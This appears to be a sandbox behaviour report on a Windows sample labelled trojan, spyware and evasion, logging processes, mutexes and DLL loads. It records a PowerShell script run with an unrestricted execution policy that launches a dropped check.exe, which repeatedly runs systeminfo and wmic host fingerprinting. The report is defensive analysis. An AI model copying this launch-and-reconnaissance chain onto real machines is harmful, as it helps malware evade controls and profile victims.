Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 24_2_00007FFD84877890	24_2_00007FFD84877890
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 24_2_00007FFD84879C80	24_2_00007FFD84879C80
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 24_2_00007FFD8487C8A5	24_2_00007FFD8487C8A5

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: String function: 00007FFD87643900 appears 92 times
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: String function: 00007FF6D9232710 appears 82 times
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: String function: 00007FFD87643880 appears 33 times

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1008 -s 940

Source: unicodedata.pyd.4.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: python3.dll.6.dr	Static PE information: No import functions for PE file found
Source: python3.dll.4.dr	Static PE information: No import functions for PE file found

Source: Qt5Core.dll.4.dr	Static PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: Qt5Core.dll.6.dr	Static PE information: Section: .qtmimed ZLIB complexity 0.997458770800317

Source: classification engine

Classification label: mal72.troj.spyw.evad.winPS1@39/433@1/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\ntmNrnMq.zip

Jump to behavior

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2960:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1008
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6704
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6724
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4oaljy4l.zbb.ps1

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: check.exe	String found in binary or memory: <!--StartFragment-->
Source: check.exe	String found in binary or memory: <!--StartFragment-->
Source: check.exe	String found in binary or memory: <!--StartFragment-->

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: unknown	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1008 -s 940
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6704 -s 976
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6724 -s 996
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdatauser.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: msvcp140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5widgets.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5gui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
